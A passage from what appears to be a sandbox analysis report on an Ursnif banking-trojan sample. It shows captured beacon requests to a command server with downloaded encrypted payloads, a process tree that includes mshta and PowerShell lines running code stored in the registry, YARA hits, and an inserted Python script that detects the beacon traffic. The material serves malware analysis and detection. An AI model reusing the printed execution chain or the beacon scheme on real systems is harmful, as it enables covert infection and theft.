87 0c 9a d8 40 02 b6 78 d9 3c 5d 0e 45 6d e7 1a 21 99 b0 29 1b e3 e0 c0 2b 02 47 bc 53 00 3c 8a 66 74 ca 12 c0 49 dc 75 43 18 6a 42 18 c7 9e 0b 55 fd 45 f0 5b 24 3a b5 3c 10 b5 a7 10 c7 28 d0 c7 35 3f 54 35 0e 43 41 1d bf f5 f3 9a f4 ff 81 26 48 fc 80 5f f1 f8 71 99 e4 0e 17 6a 1c 75 5d 64 95 f7 e1 88 a2 00 94 90 5f 6c d5 cd fc a5 72 b7 b6 e5 e8 5a 13 63 f5 4b b5 8e f2 82 41 64 7f ad 8e bd e9 6e 51 d0 ef ec 63 ab 78 09 ea e7 8c 71 e8 5b 12 a9 e1 0c 48 ed cb 06 da f3 7d ca 85 d7 45 2a 4b b1 c5 1c 9e 75 8e 33 0a 02 a8 57 71 0d b4 5c b3 46 dc 38 88 72 5b 66 00 55 4f 00 28 2c 61 67 7b 85 11 64 8c 84 de df 2f 2c 69 eb ba a7 86 a4 d1 ce df aa e3 93 48 d5 31 9a b5 8c e4 87 f9 e2 a0 e3 0c 04 b3 c4 40 f7 0f 35 de fc 0b d9 d3 2a 45 b4 91 93 26 51 19 8d f2 45 67 3b ed ed 42 e2 04 cd 3e 9c e7 c6 6f 15 1b aa 04 9e d3 e4 9f c4 7b 67 37 b7 40 48 05 e7 10 93 59 8a 81 f5 ca 77 22 e4 64 f5 a9 d5 0a 81 0e 53 8f c5 43 23 2d 3d 0f e4 a2 8a df c3 7b 13 3e 33 04 8c 56 2d 62 47 40 39 58 13 9c 69 1e b2 1f da 02 b7 59 0b d1 3e
                      Data Ascii: "1,H6G+xh6SKurAG*&nLz#zv\[<6TL{FI;A~2;O`<?3~n[93CeAH\9;EB,&J16h0ZQ'0%_CHJA 0"ZFXiyxd'hsX=>nkCsFmt)e%wv%zx{aMo.&6*(DY@>N,El3yn',<bbh]Z#?7eyT-9r_0QPl(Z~w]O6{S[reh4]vB5SaF]~K(aB<1LhK6^FC,3vRjC}XY5"_r~vGf{)XdxLEqD&e[)1oi2b'c1hmpef=4h?w>E~t"+F9n_>z|/g6~S@x<]Em!)+GS<ftIuCjBUE[$:<(5?T5CA&H_qju]d_lrZcKAdnQcxq[H}E*Ku3Wq\F8r[fUO(,ag{d/,iH1@5*E&QEg;B>o{g7@HYw"dSC#-={>3V-bG@9XiY>
May 4, 2022 16:27:53.642851114 CEST | 1410 | OUT | GET /drew/1WYEBXmiF_2FMnySkI/AGFp1zkHl/1n_2BEbfMMGs7_2FFktP/VnEJxGiu_2BRheq2fuh/m_2BewmRx2tkooth41m1v2/ScpupYz0Zq373/g7DAOhtw/iFxPzO8lMv_2FTBIGbEpoxM/_2BCzEa_2F/P_2F_2BQrmvSKhVMj/GyG1jPMXpOEy/oR5Pq_2FkHh/PA1zCgDa0RmsjY/QkvATPynH2lMVaaST9iah/v7ORKI7orJRBYUn3/rdkm98ca_2BPJFG/T0_2BoDf88Xk4HDERX/d7f20yS8m/U9grT5w.jlk HTTP/1.1
                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                      Host: 185.189.151.28
                      Connection: Keep-Alive
                      Cache-Control: no-cache
May 4, 2022 16:27:53.934010029 CEST | 1411 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Wed, 04 May 2022 14:27:53 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 238738
                      Connection: keep-alive
                      Pragma: public
                      Accept-Ranges: bytes
                      Expires: 0
                      Cache-Control: must-revalidate, post-check=0, pre-check=0
                      Content-Disposition: inline; filename="62728d69e08bf.bin"
                      Data Raw: 3b 4c 6b f7 b7 25 70 03 88 2d 7a 37 9e a1 c8 64 0b d8 31 31 97 0f c5 b0 5f f3 81 6d 9e c3 45 83 0a 34 18 f9 2a 0e ff 72 ff c7 33 d5 29 5d 81 f6 a5 6c 33 59 c7 fc d9 7d 59 a6 2c 44 a0 08 b0 48 8b 5c 88 ed 4d 9c 4e f2 9c 04 cf da 87 8f fc 28 44 1b 1f d6 84 bb dc 53 47 f0 25 da f7 b6 56 48 26 5b 83 11 f9 80 79 d3 3f ab 3f 7b 8a 14 23 8f 4d 34 6e a5 8d 52 88 cb c6 51 bd 4e 27 49 d6 ba 33 30 b3 e5 52 76 59 f9 49 45 bb 09 82 03 75 7c e0 12 67 43 e1 33 8e b9 58 1e 5a b6 16 2b cf ae 0e 8d cd e6 c9 bb 31 32 9c b6 7f 38 ef b7 14 c5 6b 56 72 db db f5 20 42 b0 21 7b c2 d3 e4 6b fa b6 29 2f 63 6f 43 cf fd 33 d1 f1 f3 33 82 eb 56 90 92 b4 a4 9c 0b 34 10 8d ed df d7 30 79 ee 6a 70 e6 2e 5b 2f d9 bf ad 8c 81 5f ec d7 15 c8 85 f6 42 0f 37 b8 b0 93 ac a1 85 c4 23 5e e0 43 b2 f2 93 6a d4 39 18 f6 17 0d d7 36 b6 2c 4f 0e 34 06 73 fa a7 52 3b a0 32 82 5c f1 6b e4 7a 99 fc 8d 27 58 8a 96 1b 31 e8 14 ee 43 b7 d2 fb 67 09 cb 2e 03 64 ad e4 8a 6a 5f 40 27 ac a0 21 ac cd 7a c6 94 f3 0b 04 1c f4 15 03 a5 59 24 02 68 2c 35 6a 8b 51 d7 90 e5 d9 30 8a 7f dc c2 68 ae 3c 42 9a 5c 68 06 a5 c2 c4 6e 0f ef 64 32 4f 69 ab 18 b4 9e 99 1f f5 05 56 47 02 8e 9f 27 d4 ff 10 20 e7 ed cd b1 4b 87 6e 27 42 1e 3e 24 80 4a 04 3c a3 49 30 16 f6 80 ec ff 7f 69 7e 67 e9 15 f7 0c 8d 63 a1 52 09 e9 b1 0e 05 e9 aa 92 c3 6e a8 af a5 9b c3 81 03 f7 56 3b 62 cc 61 4a 47 01 5f 44 7c dd 73 98 b0 56 89 42 12 05 2f fd 1e 39 b9 f3 98 27 a9 28 d5 bc c4 8e a4 e7 ec ab 89 c4 ce 19 ea b9 9c 21 dc 88 24 ec 64 2b cb a0 eb bf ca ae d2 49 96 b6 8a 04 ab fa 95 77 fa 63 0a 7a 0d 95 a1 96 99 44 58 4c cf 57 ae a4 39 c8 34 1e 91 57 0a 36 63 09 ab 63 76 c2 c1 18 dd ac c2 70 bf 06 25 e6 27 5d fc f2 4f 2b 48 d4 2b 9b aa 75 25 b7 70 f5 86 3b 83 06 05 3f 10 6e 86 51 69 da a6 a8 0d 8f 67 9f 77 dd f3 f1 bc a3 2b 9b cc 07 3c cd d5 4d 2e 5b 8d 0a 6e f3 42 ee 85 31 81 12 49 42 23 da f6 e0 21 58 34 f1 98 44 20 e0 34 20 6c e2 a7 e9 96 39 bf 64 eb 96 ab af dd c2 e5 93 2f 77 12 5b 31 b6 d4 8e 98 e1 b0 b9 97 01 7b 07 2a 
86 59 bd e8 00 a8 a3 36 12 48 2c f4 25 13 19 ba df bb ee 61 56 99 a8 ad 21 38 93 bd 47 26 58 af f0 db 46 7b b6 65 aa de cd dc 57 71 ed 57 29 3c a1 90 6f b4 ca a6 dc 2b a1 45 2a 15 3d 27 0d 14 ac e3 a7 f3 ce f4 a4 99 60 7c d7 95 79 41 ca 61 9a 6f 54 40 1a 4e 73 8d c8 57 85 c6 32 d8 e6 76 bd 9e 2b c8 77 57 64 55 68 1e e8 b8 ce e3 27 ea 88 e0 6b 84 d6 22 a8 40 53 1f fe fd 7f 2c 64 e5 e3 c0 ba b0 7c 8c 1f 0a 1f 3d a3 aa df 4c 84 66 69 de c4 52 16 4a cb 9d 1b 22 74 04 be b4 75 aa ac 10 43 9c 84 24 1d 8b bb 5b c6 a9 da 99 7a c4 10 3c d8 88 4e 6f 5d 84 05 33 69 2b e5 f6 16 bf 76 b7 e2 b7 61 1a 36 95 4b 28 79 75 83 0d af 82 36 39 fb e4 c0 3c c2 32 b4 cc c4 35 09 29 45 a8 bf a7 f5 c5 b1 91 71 b2 a5 a9 77 0d 1f 79 f3 f3 6c a3 ab 52 a9 26 9e df 64 d9 64 a6 4f 74 f8 7f be 12 b6 01 54 bd bc e1 a6 7e 85 e2 01 e7 11 f6 40 6c 49 4a e2 ec 18 e1 9b c7 7e 26 d7 09 41 4c b1 bd cb b6 91 c6 24 7f 1a 3d 1b 36 89 c0 c2 20 6c 33 01 13 79 75 f9 66 8c 40 13 41 38 66 3a 0f 9b 37 54 93 3b 5b 14 19 90 ea 68 99 54 78 3a f9 f4 73 f6
                      Data Ascii: ;Lk%p-z7d11_mE4*r3)]l3Y}Y,DH\MN(DSG%VH&[y??{#M4nRQN'I30RvYIEu|gC3XZ+128kVr B!{k)/coC33V40yjp.[/_B7#^Cj96,O4sR;2\kz'X1Cg.dj_@'!zY$h,5jQ0h<B\hnd2OiVG' Kn'B>$J<I0i~gcRnV;baJG_D|sVB/9'(!$d+IwczDXLW94W6ccvp%']O+H+u%p;?nQigw+<M.[nB1IB#!X4D 4 l9d/w[1{*Y6H,%aV!8G&XF{eWqW)<o+E*='`|yAaoT@NsW2v+wWdUh'k"@S,d|=LfiRJ"tuC$[z<No]3i+va6K(yu69<25)EqwylR&ddOtT~@lIJ~&AL$=6 l3yuf@A8f:7T;[hTx:s
May 4, 2022 16:27:54.122081995 CEST | 1665 | OUT | GET /drew/DI9hOfnq4sis3AGOPt/_2FSN_2BC/vQMmpDQPqFMgJd7cY2BM/bpPiaoMoE2NRqo_2F46/T_2F2moLttcApM2j8JSDhs/WTmAL93U1NjUV/LMXna7GA/0XrWXSOJuSDBIpGqh8yB0Uw/8wBvAy1ROY/CU6_2BgS3mg1oC_2F/fr7BBq_2FOIM/8zgmlDNHCEg/MQH_2B5kPaL7jc/fyWcKgX2hWtfe66c_2BLA/pYfH_2BKPQZE6m8n/dgy8gM_2BVyJKF1/06D2L7PXyZQ5x_2F0m/7pDuXDGuxyU/cHq.jlk HTTP/1.1
                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                      Host: 185.189.151.28
                      Connection: Keep-Alive
                      Cache-Control: no-cache
May 4, 2022 16:27:54.411616087 CEST | 1667 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Wed, 04 May 2022 14:27:54 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 1856
                      Connection: keep-alive
                      Pragma: public
                      Accept-Ranges: bytes
                      Expires: 0
                      Cache-Control: must-revalidate, post-check=0, pre-check=0
                      Content-Disposition: inline; filename="62728d6a5f4fa.bin"
                      Data Raw: 9b a0 46 9f fb 74 7e 4c 02 9a 3e fd d9 71 c7 75 b7 c0 cf a4 f1 8f 69 7b ca 68 40 93 06 4e b2 61 6c 45 b6 60 ec c8 ae 61 ba a7 30 65 32 00 93 c4 61 b5 26 75 0f 9c 24 d6 6b 8d 49 83 bd 29 e5 c2 8e 84 e2 03 a7 53 8f 50 53 4e 60 d2 b0 83 79 b0 30 aa 56 2b de 37 b8 1e 29 a1 fe 12 f0 a4 8a b6 1c 50 54 8d e2 11 22 11 00 28 bf 5a 8e 88 5c f1 a5 ea 66 e4 d9 1d 25 32 3c 0d b9 88 74 8f 8e 4d dd 6f 8d 0c ff 3b fb ab 12 a8 aa 7b 3c 4a 84 d1 1c 81 c0 03 d3 5a f7 ca 0e 84 a2 cd bf 4b 4b 8a 9a a7 0b 3b 18 09 93 80 bd 2c 22 aa 10 18 d9 46 7f 3f 4a 98 a1 32 15 53 4d 52 37 e7 3d fc df 0b 99 86 dc 6e 28 45 31 41 af 5b f3 54 b8 c3 c4 0e de b4 8c 35 e7 ae 58 26 d9 51 48 2a a9 7c 38 bf 34 02 be a4 a2 60 c2 f2 a1 0b a5 b7 b8 45 00 65 8d 87 9e 0f 13 57 99 55 9c 6f 29 be 48 cb 2b 94 3e 15 dc a9 ca 66 19 e4 4b 96 5f 82 fb 25 15 6c e8 81 ba c7 c6 11 8f a6 22 f3 d3 46 8e 0a 4e a3 47 a3 43 c4 28 a9 04 8e 33 96 50 fc ff da 85 d8 1a 90 b6 c3 b6 70 00 35 37 e8 e0 9b 16 3a 8f 42 cc df f8 46 d9 65 92 fb a4 09 89 80 4b ed 32 53 0c fb 12 10 01 3c a7 65 18 1f 85 a3 3d 19 3b 35 60 ca 34 5d 34 52 31 52 97 a4 f7 e9 c8 a8 6d fd aa 00 d9 1a 03 b4 cf d3 6b 1d c9 a9 fb 98 be 9e ee 6e 98 aa dc 13 43 f5 f1 a4 c8 15 60 ac 89 bc 66 0e c3 5c 86 cf 87 08 78 b0 d7 93 ca a5 f3 d7 df 9f 82 0e 0c 47 f8 ba bb 22 96 1d 41 af ad 20 bb 3b f4 7c 43 d6 33 6b c5 a7 00 ad c7 e3 85 36 3d a9 cd ff 43 13 5d 1a 98 65 a5 39 a0 04 97 16 f2 aa 48 11 c3 92 11 ad e2 6c a1 be f1 26 93 a6 ac 32 e7 cb 42 6c f0 44 33 e2 1d 8e ae 3e b7 6c 0e 9d d6 61 ea 8a 3d 3b f9 10 d5 5e 6f e6 95 69 c6 71 9b d9 76 5a d7 a6 6d 73 3c 9c 16 98 fe 91 6c 22 21 a9 0d a3 b8 32 ec 0c e2 56 21 bd 0f b2 d9 7d 28 84 dc 5c 0a d0 73 cb ab bd 78 b6 e9 06 c7 a0 94 a6 59 4e d2 71 5b 21 08 5b 65 ac e4 58 76 1e 02 c8 9f 0d dd e0 90 25 a2 63 d5 df 0d 62 e9 e1 79 ab 4a 3b 73 dc 24 a2 34 4b 8e f7 84 e2 34 b7 48 aa f8 38 8e 40 82 ea 3e f7 65 c4 e9 55 1e 1c 09 eb 5f e8 d6 e0 be 03 c7 53 d9 7b 75 89 9d 91 ca e8 cf 8b fc 0e a2 1d 8b 29 79 32 6b ce 
7d 50 cd 11 62 8e 9f e2 49 17 42 32 80 05 48 f4 b4 02 6d 95 48 d1 8f cf 58 79 80 88 10 83 25 2d 9c d3 a5 62 18 d5 cb e7 f6 ab c9 05 71 9d 97 91 57 12 95 83 e4 1e 21 ce 98 59 64 61 16 0c bc 86 44 3f 1e 63 85 6a b9 bb dc da c8 93 85 f0 15 ac 87 e7 0f bb 30 62 68 64 d9 35 20 8f a7 46 82 e0 bf e8 92 a0 37 1b 44 4e 09 c2 70 7b 5d ca 65 06 92 d7 1f 02 40 68 d8 f9 ce fe 22 b9 52 d6 37 3d 79 f5 4c bd 14 0c 30 6c e6 2b 48 c0 26 30 b8 43 9d de c8 55 66 eb 9d 88 ce 14 7f 49 50 c5 3f 64 97 0f 7a 4f 48 80 11 af 12 1c 95 66 bf ed ec e1 bd 12 35 7c da 51 24 8f b3 9f f8 1f 9b c0 d9 50 46 63 0f d2 4e 5c 43 00 32 a9 65 5a c3 30 73 8d 98 fa ff 3a 7d c3 b4 d5 ea d1 45 9c 4b 6c 69 1c f6 b4 3a 55 5c 5c 0e de 2a c7 47 93 6d ec 2b 02 99 c6 7b 5d ce 41 e3 ee c9 91 46 6e d4 10 d2 83 3e f6 91 b5 c3 ce d1 b9 12 29 94 e4 5a 7d ac dd 03 fc 4e 8f 4c 65 3e b6 12 c0 2b 6d 73 2a f6 b1 df bd a5 1d 5a 13 b6 7f a5 ca e1 33 ca 6b a4 88 3e c4 2e dd b1 9f 2c 6b 18 5e de cf fe 3b 59 3c 35 5f cf 58 4b 80 b6 2b aa 8f fe 2c ed d8 3b 2e 42 bb af 6f c1
                      Data Ascii: Ft~L>qui{h@NalE`a0e2a&u$kI)SPSN`y0V+7)PT"(Z\f%2<tMo;{<JZKK;,"F?J2SMR7=n(E1A[T5X&QH*|84`EeWUo)H+>fK_%l"FNGC(3Pp57:BFeK2S<e=;5`4]4R1RmknC`f\xG"A ;|C3k6=C]e9Hl&2BlD3>la=;^oiqvZms<l"!2V!}(\sxYNq[![eXv%cbyJ;s$4K4H8@>eU_S{u)y2k}PbIB2HmHXy%-bqW!YdaD?cj0bhd5 F7DNp{]e@h"R7=yL0l+H&0CUfIP?dzOHf5|Q$PFcN\C2eZ0s:}EKli:U\\*Gm+{]AFn>)Z}NLe>+ms*Z3k>.,k^;Y<5_XK+,;.Bo
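The three GETs above fire ET SID 2033203 ("URI Struct M1 (_2B)"), and the traits that make them recognisable are all in the request itself: a path of 19 to 20 opaque alphanumeric segments under `/drew/`, the `_2B`/`_2F` tokens, a short random file name with a three-letter extension (`1gu.jlk`, `U9grT5w.jlk`, `cHq.jlk`), the bare `Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)` user-agent, a bare-IP `Host`, and `Cache-Control: no-cache` with no `Accept` header, all from `rundll32.exe`. The following is an added example, not part of the report and not the body of the ET rule (the page names the rule, not its content), that scores those traits over the three captured requests and one constructed benign request. `decode_path()` assumes `_2B` and `_2F` are `+` and `/` with `%` swapped for `_` and that the `/` separators were inserted into one continuous string; that reading is the author's, not the report's, and the decoded string is still encrypted, so it is only useful for pivoting on the inner payload, not for reading it.

```python
"""Structural check for Ursnif-style beacon GETs, run over the three requests
captured above and one constructed benign request.

Added example, not part of the report and not the body of ET SID 2033203. The
decode_path() reading of "_2B"/"_2F" as "+"/"/" (percent-encoding with "%"
replaced by "_") is the author's assumption.
"""
from __future__ import annotations
import re

UA_RE = re.compile(r"^Mozilla/4\.0 \(compatible; MSIE \d\.\d; Windows NT [\d.]+\)$")
SEGMENT_RE = re.compile(r"^[A-Za-z0-9_]+$")
FILE_RE = re.compile(r"^[A-Za-z0-9]{1,8}\.[a-z]{3}$")
BEACON_THRESHOLD = 4  # author's choice: four of the six traits


def parse_request(raw: str) -> dict:
    """Split one raw HTTP/1.x request into method, path and a lower-cased header map."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers}


def beacon_score(req: dict) -> tuple[int, list[str]]:
    """Count the beacon traits present; each reason is one observable to pivot on."""
    path, headers = req["path"], req["headers"]
    parts = path.strip("/").split("/")
    reasons = []
    if len(parts) >= 8 and all(SEGMENT_RE.match(p.split(".", 1)[0]) for p in parts):
        reasons.append(f"{len(parts)} opaque path segments")
    if "_2B" in path or "_2F" in path:
        reasons.append("_2B/_2F in path")
    if FILE_RE.match(parts[-1]):
        reasons.append("short random file name with 3-letter extension")
    if UA_RE.match(headers.get("user-agent", "")):
        reasons.append("bare MSIE user-agent")
    if headers.get("cache-control", "").lower() == "no-cache" and "accept" not in headers:
        reasons.append("Cache-Control: no-cache and no Accept header")
    if re.fullmatch(r"\d{1,3}(?:\.\d{1,3}){3}", headers.get("host", "")):
        reasons.append("Host is a bare IPv4 address")
    return len(reasons), reasons


def is_beacon(raw: str) -> bool:
    return beacon_score(parse_request(raw))[0] >= BEACON_THRESHOLD


def decode_path(path: str) -> str:
    """Reverse the path mangling (assumption, see module docstring): drop the leading
    directory and the file extension, join the segments, restore '+' and '/'.
    The result is the still-encrypted inner string, useful only as a pivot value."""
    parts = path.strip("/").split("/")
    inner = "".join(parts[1:]).rsplit(".", 1)[0]
    return inner.replace("_2B", "+").replace("_2F", "/")


# Headers exactly as the three captured requests carried them.
COMMON_HEADERS = ("User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)\r\n"
                  "Host: 185.189.151.28\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n")
# Request lines copied from the capture above.
CAPTURED_REQUESTS = [
    "GET /drew/yaLRzubGjQS/CFxKDeNAAfhLlC/CaygnSUs24bnRCfVOMlKd/kOu58i9k96sMGpEh/2ImNOGSnuowiNkO/ip_2FJtr3_2FyC3y34/NWeB6KDbS/szu4WIEy31uBJrZBRkk7/BA3lZi_2FOvOpDSYS4s/rj2HYxhZ8zs8SSN1QxOHNt/a0noZ7RHbBD3e/0lyarAzU/kswi_2B_2Bji3xmfI9dMO1H/eF7wdYyOYS/J0KjUNI3Yrq9HIDIZ/2ePpl9Tr16LA/Mto8yX4U3i1XH7H/1gu.jlk HTTP/1.1\r\n" + COMMON_HEADERS,
    "GET /drew/1WYEBXmiF_2FMnySkI/AGFp1zkHl/1n_2BEbfMMGs7_2FFktP/VnEJxGiu_2BRheq2fuh/m_2BewmRx2tkooth41m1v2/ScpupYz0Zq373/g7DAOhtw/iFxPzO8lMv_2FTBIGbEpoxM/_2BCzEa_2F/P_2F_2BQrmvSKhVMj/GyG1jPMXpOEy/oR5Pq_2FkHh/PA1zCgDa0RmsjY/QkvATPynH2lMVaaST9iah/v7ORKI7orJRBYUn3/rdkm98ca_2BPJFG/T0_2BoDf88Xk4HDERX/d7f20yS8m/U9grT5w.jlk HTTP/1.1\r\n" + COMMON_HEADERS,
    "GET /drew/DI9hOfnq4sis3AGOPt/_2FSN_2BC/vQMmpDQPqFMgJd7cY2BM/bpPiaoMoE2NRqo_2F46/T_2F2moLttcApM2j8JSDhs/WTmAL93U1NjUV/LMXna7GA/0XrWXSOJuSDBIpGqh8yB0Uw/8wBvAy1ROY/CU6_2BgS3mg1oC_2F/fr7BBq_2FOIM/8zgmlDNHCEg/MQH_2B5kPaL7jc/fyWcKgX2hWtfe66c_2BLA/pYfH_2BKPQZE6m8n/dgy8gM_2BVyJKF1/06D2L7PXyZQ5x_2F0m/7pDuXDGuxyU/cHq.jlk HTTP/1.1\r\n" + COMMON_HEADERS,
]
# Constructed benign request for contrast.
BENIGN_REQUEST = ("GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
                  "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\n"
                  "Accept: text/html\r\n\r\n")

if __name__ == "__main__":
    for raw in CAPTURED_REQUESTS + [BENIGN_REQUEST]:
        req = parse_request(raw)
        score, reasons = beacon_score(req)
        print(f"{score}/6 {req['path'][:40]}... {'; '.join(reasons)}")
```

The score, not any single trait, is the point: a bare-IP Host or an old MSIE user-agent alone is noise, but four or more of these together on a GET from `rundll32.exe` is worth an alert even where the IDS signature has been rotated away.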


                      Click to jump to process

                      Target ID:0
                      Start time:16:27:10
                      Start date:04/05/2022
                      Path:C:\Windows\System32\loaddll32.exe
                      Wow64 process (32bit):true
                      Commandline:loaddll32.exe "C:\Users\user\Desktop\xaj0e933Uv.dll"
                      Imagebase:0xe90000
                      File size:116736 bytes
                      MD5 hash:7DEB5DB86C0AC789123DEC286286B938
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      Target ID:1
                      Start time:16:27:10
                      Start date:04/05/2022
                      Path:C:\Windows\SysWOW64\cmd.exe
                      Wow64 process (32bit):true
                      Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\xaj0e933Uv.dll",#1
                      Imagebase:0x1190000
                      File size:232960 bytes
                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      Target ID:2
                      Start time:16:27:11
                      Start date:04/05/2022
                      Path:C:\Windows\SysWOW64\rundll32.exe
                      Wow64 process (32bit):true
                      Commandline:rundll32.exe "C:\Users\user\Desktop\xaj0e933Uv.dll",#1
                      Imagebase:0x10e0000
                      File size:61952 bytes
                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.297325888.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.464317231.000000000526F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.297834584.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.343634422.0000000005569000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.297429352.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.461814934.0000000005049000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.297681439.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.343681335.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.297590765.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.344393693.00000000053EC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.343553499.00000000054EA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.297638770.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.297792500.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.342664941.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.297847872.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.397268016.0000000006168000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:high

                      Target ID:17
                      Start time:16:27:58
                      Start date:04/05/2022
                      Path:C:\Windows\System32\mshta.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Jqlc='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Jqlc).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                      Imagebase:0x7ff63b5a0000
                      File size:14848 bytes
                      MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      Target ID:18
                      Start time:16:28:00
                      Start date:04/05/2022
                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name axgpbo -value gp; new-alias -name slctai -value iex; slctai ([System.Text.Encoding]::ASCII.GetString((axgpbo "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Imagebase:0x7ff6ba650000
                      File size:447488 bytes
                      MD5 hash:95000560239032BC68B4C2FDFCDEF913
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET
                      Yara matches:
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000012.00000003.415812093.000001E636EFC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:high

                      Target ID:19
                      Start time:16:28:01
                      Start date:04/05/2022
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff647620000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      Target ID:21
                      Start time:16:28:12
                      Start date:04/05/2022
                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.cmdline
                      Imagebase:0x7ff71b4c0000
                      File size:2739304 bytes
                      MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET
                      Reputation:moderate

                      Target ID:22
                      Start time:16:28:14
                      Start date:04/05/2022
                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5F15.tmp" "c:\Users\user\AppData\Local\Temp\m5pod5s5\CSCDE04DA8616441A6AC3074D39CFFC1D3.TMP"
                      Imagebase:0x7ff66f440000
                      File size:47280 bytes
                      MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
